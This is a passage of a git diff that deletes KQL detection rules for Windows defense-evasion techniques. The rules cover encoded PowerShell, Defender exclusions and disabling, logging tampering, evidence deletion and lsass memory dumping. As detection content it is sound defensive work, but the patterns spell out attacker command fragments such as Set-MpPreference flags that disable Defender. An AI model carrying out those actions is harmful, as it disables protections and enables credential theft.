diff --git a/Defense Evasion/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql b/Defense Evasion/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql deleted file mode 100644 index 7b67f975..00000000 --- a/Defense Evasion/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems) -// Date: 2022/03/01 -// Level: high -// Description: Detects base64 encoded .NET reflective loading of Assembly -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027, attack.t1620 -DeviceProcessEvents -| where ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" or ProcessCommandLine contains "AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC" or ProcessCommandLine contains "BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp" or ProcessCommandLine contains "AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK" or ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA" or ProcessCommandLine contains "WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" \ No newline at end of file 
diff --git a/Defense Evasion/PowerShell_Base64_Encoded_WMI_Classes.kql b/Defense Evasion/PowerShell_Base64_Encoded_WMI_Classes.kql
deleted file mode 100644
index 78c3b4de..00000000
--- a/Defense Evasion/PowerShell_Base64_Encoded_WMI_Classes.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/30 -// Level: high -// Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc. -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and ((ProcessCommandLine contains "VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg" or ProcessCommandLine contains "V2luMzJfTG9nZ2VkT25Vc2Vy" or ProcessCommandLine contains "dpbjMyX0xvZ2dlZE9uVXNlc" or ProcessCommandLine contains "XaW4zMl9Mb2dnZWRPblVzZX") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw" or ProcessCommandLine contains "cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA" or ProcessCommandLine contains "V2luMzJfUHJvY2Vzc" or ProcessCommandLine contains "dpbjMyX1Byb2Nlc3" or ProcessCommandLine contains "XaW4zMl9Qcm9jZXNz") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg" or ProcessCommandLine contains "V2luMzJfU2NoZWR1bGVkSm9i" or ProcessCommandLine contains "dpbjMyX1NjaGVkdWxlZEpvY" or ProcessCommandLine contains "XaW4zMl9TY2hlZHVsZWRKb2") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A" or ProcessCommandLine contains 
"V2luMzJfU2hhZG93Y29we" or ProcessCommandLine contains "dpbjMyX1NoYWRvd2NvcH" or ProcessCommandLine contains "XaW4zMl9TaGFkb3djb3B5") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A" or ProcessCommandLine contains "cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA" or ProcessCommandLine contains "V2luMzJfVXNlckFjY291bn" or ProcessCommandLine contains "dpbjMyX1VzZXJBY2NvdW50" or ProcessCommandLine contains "XaW4zMl9Vc2VyQWNjb3Vud")) \ No newline at end of file diff --git a/Defense Evasion/PowerShell_Console_History_Logs_Deleted.kql b/Defense Evasion/PowerShell_Console_History_Logs_Deleted.kql deleted file mode 100644 index 9b323c33..00000000 --- a/Defense Evasion/PowerShell_Console_History_Logs_Deleted.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/15 -// Level: medium -// Description: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence -// Tags: attack.defense_evasion, attack.t1070 -DeviceFileEvents -| where FolderPath endswith "\\PSReadLine\\ConsoleHost_history.txt" \ No newline at end of file diff --git a/Defense Evasion/PowerShell_Core_DLL_Loaded_Via_Office_Application.kql b/Defense Evasion/PowerShell_Core_DLL_Loaded_Via_Office_Application.kql deleted file mode 100644 index 999c9ee8..00000000 --- a/Defense Evasion/PowerShell_Core_DLL_Loaded_Via_Office_Application.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/01
-// Level: medium
-// Description: Detects PowerShell core DLL being loaded by an Office Product
-// Tags: attack.defense_evasion
-DeviceImageLoadEvents
-| where (FolderPath contains "\\System.Management.Automation.Dll" or FolderPath contains "\\System.Management.Automation.ni.Dll") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/Defense Evasion/PowerShell_Logging_Disabled_Via_Registry_Key_Tampering.kql b/Defense Evasion/PowerShell_Logging_Disabled_Via_Registry_Key_Tampering.kql
deleted file mode 100644
index dd39645e..00000000
--- a/Defense Evasion/PowerShell_Logging_Disabled_Via_Registry_Key_Tampering.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/02
-// Level: high
-// Description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging
-// Tags: attack.defense_evasion, attack.t1564.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\Microsoft\\Windows\\PowerShell" or RegistryKey contains "\\Microsoft\\PowerShellCore") and (RegistryKey endswith "\\ModuleLogging\\EnableModuleLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockInvocationLogging" or RegistryKey endswith "\\Transcription\\EnableTranscripting" or RegistryKey endswith "\\Transcription\\EnableInvocationHeader" or RegistryKey endswith "\\EnableScripts")
\ No newline at end of file
diff --git a/Defense Evasion/PowerShell_Script_Change_Permission_Via_Set-Acl.kql b/Defense Evasion/PowerShell_Script_Change_Permission_Via_Set-Acl.kql
deleted file mode 100644
index 5e298951..00000000
--- a/Defense Evasion/PowerShell_Script_Change_Permission_Via_Set-Acl.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/18
-// Level: high
-// Description: Detects PowerShell execution to set the ACL of a file or a folder
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject " and ProcessCommandLine contains "-Path ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/PowerShell_Set-Acl_On_Windows_Folder.kql b/Defense Evasion/PowerShell_Set-Acl_On_Windows_Folder.kql
deleted file mode 100644
index b53f42c8..00000000
--- a/Defense Evasion/PowerShell_Set-Acl_On_Windows_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/18
-// Level: high
-// Description: Detects PowerShell scripts to set the ACL to a file in the Windows folder
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "-Path \"C:\\Windows" or ProcessCommandLine contains "-Path 'C:\\Windows" or ProcessCommandLine contains "-Path %windir%" or ProcessCommandLine contains "-Path $env:windir") and (ProcessCommandLine contains "FullControl" or ProcessCommandLine contains "Allow")
\ No newline at end of file
diff --git a/Defense Evasion/Powershell_Base64_Encoded_MpPreference_Cmdlet.kql b/Defense Evasion/Powershell_Base64_Encoded_MpPreference_Cmdlet.kql
deleted file mode 100644
index fc55890a..00000000
--- a/Defense Evasion/Powershell_Base64_Encoded_MpPreference_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/04 -// Level: high -// Description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "QWRkLU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "BZGQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "U2V0LU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "TZXQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "YWRkLW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "hZGQtbXBwcmVmZXJlbmNlI" or ProcessCommandLine contains "c2V0LW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "zZXQtbXBwcmVmZXJlbmNlI") or (ProcessCommandLine contains "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA") \ No newline at end of file 
diff --git a/Defense Evasion/Powershell_Defender_Disable_Scan_Feature.kql b/Defense Evasion/Powershell_Defender_Disable_Scan_Feature.kql
deleted file mode 100644
index f715383e..00000000
--- a/Defense Evasion/Powershell_Defender_Disable_Scan_Feature.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/03 -// Level: high -// Description: Detects requests to disable Microsoft Defender features using PowerShell commands -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains "DisableArchiveScanning " or ProcessCommandLine contains "DisableRealtimeMonitoring " or ProcessCommandLine contains "DisableIOAVProtection " or ProcessCommandLine contains "DisableBehaviorMonitoring " or ProcessCommandLine contains "DisableBlockAtFirstSeen " or ProcessCommandLine contains "DisableCatchupFullScan " or ProcessCommandLine contains "DisableCatchupQuickScan ") and (ProcessCommandLine contains "$true" or ProcessCommandLine contains " 1 ")) or ((ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBJAE8AQQBWAFAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUASQBPAEEAVgBQAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEIAZQBoAGEAdgBpAG8AcgBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGwAbwBjAGsAQQB0AEYAaQByAHMAdABTAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBsAG8AYwBrAEEAdABGAGkAcgBzAHQAUwBlAGUAbgAgA" or ProcessCommandLine contains 
"EAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQByAGUAYQBsAHQAaQBtAGUAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAcgBlAGEAbAB0AGkAbQBlAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAHIAZQBhAGwAdABpAG0AZQBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBpAG8AYQB2AHAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAaQBvAGEAdgBwAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGkAbwBhAHYAcAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGUAaABhAHYAaQBvAHIAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBlAGgAYQB2AGkAbwByAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAZQBoAGEAdgBpAG8AcgBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGwAbwBjAGsAYQB0AGYAaQByAHMAdABzAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBsAG8AYwBrAGEAdABmAGkAcgBzAHQAcwBlAGUAbgAgA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAbABvAGMAawBhAHQAZgBpAHIAcwB0AHMAZQBlAG4AIA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAEYAdQBsAGwAUwBjAGEAbgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAFEAdQBpAGMAawBTAGMAYQBuAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBBAHIAYwBoAGkAdgBlAFMAYwBhAG4AbgBpAG4AZwA") or (ProcessCommandLine contains "ZGlzYWJsZWFyY2hpdmVzY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVhcmNoaXZlc2Nhbm5pbmcg" or ProcessCommandLine contains "kaXNhYmxlYXJjaGl2ZXNjYW5uaW5nI" or ProcessCommandLine contains "RGlzYWJsZUFyY2hpdmVTY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVBcmNoaXZlU2Nhbm5pbmcg" or ProcessCommandLine contains "EaXNhYmxlQXJjaGl2ZVNjYW5uaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJlaGF2aW9ybW9uaXRvcmluZy" or 
ProcessCommandLine contains "Rpc2FibGViZWhhdmlvcm1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlYmVoYXZpb3Jtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZUJlaGF2aW9yTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVCZWhhdmlvck1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlQmVoYXZpb3JNb25pdG9yaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJsb2NrYXRmaXJzdHNlZW4g" or ProcessCommandLine contains "Rpc2FibGVibG9ja2F0Zmlyc3RzZWVuI" or ProcessCommandLine contains "kaXNhYmxlYmxvY2thdGZpcnN0c2Vlbi" or ProcessCommandLine contains "RGlzYWJsZUJsb2NrQXRGaXJzdFNlZW4g" or ProcessCommandLine contains "Rpc2FibGVCbG9ja0F0Rmlyc3RTZWVuI" or ProcessCommandLine contains "EaXNhYmxlQmxvY2tBdEZpcnN0U2Vlbi" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBmdWxsc2Nhbi" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwZnVsbHNjYW4g" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cGZ1bGxzY2FuI" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBGdWxsU2Nhbi" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwRnVsbFNjYW4g" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cEZ1bGxTY2FuI" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBxdWlja3NjYW4g" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwcXVpY2tzY2FuI" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cHF1aWNrc2Nhbi" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBRdWlja1NjYW4g" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwUXVpY2tTY2FuI" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cFF1aWNrU2Nhbi" or ProcessCommandLine contains "ZGlzYWJsZWlvYXZwcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVpb2F2cHJvdGVjdGlvbi" or ProcessCommandLine contains "kaXNhYmxlaW9hdnByb3RlY3Rpb24g" or ProcessCommandLine contains "RGlzYWJsZUlPQVZQcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVJT0FWUHJvdGVjdGlvbi" or ProcessCommandLine contains "EaXNhYmxlSU9BVlByb3RlY3Rpb24g" or ProcessCommandLine contains "ZGlzYWJsZXJlYWx0aW1lbW9uaXRvcmluZy" or ProcessCommandLine contains 
"Rpc2FibGVyZWFsdGltZW1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlcmVhbHRpbWVtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVSZWFsdGltZU1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlUmVhbHRpbWVNb25pdG9yaW5nI")) \ No newline at end of file diff --git a/Defense Evasion/Powershell_Defender_Exclusion.kql b/Defense Evasion/Powershell_Defender_Exclusion.kql deleted file mode 100644 index 72f711b3..00000000 --- a/Defense Evasion/Powershell_Defender_Exclusion.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/04/29 -// Level: medium -// Description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains " -ExclusionPath " or ProcessCommandLine contains " -ExclusionExtension " or ProcessCommandLine contains " -ExclusionProcess " or ProcessCommandLine contains " -ExclusionIpAddress ") \ No newline at end of file diff --git a/Defense Evasion/Powershell_Token_Obfuscation_-_Process_Creation.kql b/Defense Evasion/Powershell_Token_Obfuscation_-_Process_Creation.kql deleted file mode 100644 index 2e4c9b07..00000000 --- a/Defense Evasion/Powershell_Token_Obfuscation_-_Process_Creation.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/27
-// Level: high
-// Description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
-// Tags: attack.defense_evasion, attack.t1027.009
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "\\w+`(\\w+|-|.)`[\\w+|\\s]" or ProcessCommandLine matches regex ""(\\{\\d\\})+"\\s*-f" or ProcessCommandLine matches regex "\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}"
\ No newline at end of file
diff --git a/Defense Evasion/Powerup_Write_Hijack_DLL.kql b/Defense Evasion/Powerup_Write_Hijack_DLL.kql
deleted file mode 100644
index b2cd19b0..00000000
--- a/Defense Evasion/Powerup_Write_Hijack_DLL.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Subhash Popuri (@pbssubhash)
-// Date: 2021/08/21
-// Level: high
-// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.
-In it's default mode, it builds a self deleting .bat file which executes malicious command.
-The detection rule relies on creation of the malicious bat file (debug.bat by default).
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.001
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".bat"
\ No newline at end of file
diff --git a/Defense Evasion/Prefetch_File_Deleted.kql b/Defense Evasion/Prefetch_File_Deleted.kql
deleted file mode 100644
index c59b8323..00000000
--- a/Defense Evasion/Prefetch_File_Deleted.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Cedric MAURUGEON
-// Date: 2021/09/29
-// Level: high
-// Description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceFileEvents
-| where (FolderPath contains ":\\Windows\\Prefetch\\" and FolderPath endswith ".pf") and (not((InitiatingProcessFolderPath endswith ":\\windows\\system32\\svchost.exe" and (RequestAccountName contains "AUTHORI" or RequestAccountName contains "AUTORI"))))
\ No newline at end of file
diff --git a/Defense Evasion/PrintBrm_ZIP_Creation_of_Extraction.kql b/Defense Evasion/PrintBrm_ZIP_Creation_of_Extraction.kql
deleted file mode 100644
index 833c963a..00000000
--- a/Defense Evasion/PrintBrm_ZIP_Creation_of_Extraction.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/02
-// Level: high
-// Description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
-// Tags: attack.command_and_control, attack.t1105, attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -f" and ProcessCommandLine contains ".zip") and FolderPath endswith "\\PrintBrm.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Procdump_Execution.kql b/Defense Evasion/Procdump_Execution.kql
deleted file mode 100644
index e0baffc1..00000000
--- a/Defense Evasion/Procdump_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/08/16
-// Level: medium
-// Description: Detects usage of the SysInternals Procdump utility
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Process_Access_via_TrolleyExpress_Exclusion.kql b/Defense Evasion/Process_Access_via_TrolleyExpress_Exclusion.kql
deleted file mode 100644
index 3f8a20a2..00000000
--- a/Defense Evasion/Process_Access_via_TrolleyExpress_Exclusion.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/10
-// Level: high
-// Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
-// Tags: attack.defense_evasion, attack.t1218.011, attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\TrolleyExpress 7" or ProcessCommandLine contains "\\TrolleyExpress 8" or ProcessCommandLine contains "\\TrolleyExpress 9" or ProcessCommandLine contains "\\TrolleyExpress.exe 7" or ProcessCommandLine contains "\\TrolleyExpress.exe 8" or ProcessCommandLine contains "\\TrolleyExpress.exe 9" or ProcessCommandLine contains "\\TrolleyExpress.exe -ma ") or (FolderPath endswith "\\TrolleyExpress.exe" and (not((isnull(ProcessVersionInfoOriginalFileName) or ProcessVersionInfoOriginalFileName contains "CtxInstall"))))
\ No newline at end of file
diff --git a/Defense Evasion/Process_Creation_Using_Sysnative_Folder.kql b/Defense Evasion/Process_Creation_Using_Sysnative_Folder.kql
deleted file mode 100644
index f767153d..00000000
--- a/Defense Evasion/Process_Creation_Using_Sysnative_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2022/08/23
-// Level: medium
-// Description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055
-DeviceProcessEvents
-| where ProcessCommandLine contains ":\\Windows\\Sysnative\\" or FolderPath contains ":\\Windows\\Sysnative\\"
\ No newline at end of file
diff --git a/Defense Evasion/Process_Memory_Dump_Via_Comsvcs.DLL.kql b/Defense Evasion/Process_Memory_Dump_Via_Comsvcs.DLL.kql
deleted file mode 100644
index 2530eb6f..00000000
--- a/Defense Evasion/Process_Memory_Dump_Via_Comsvcs.DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
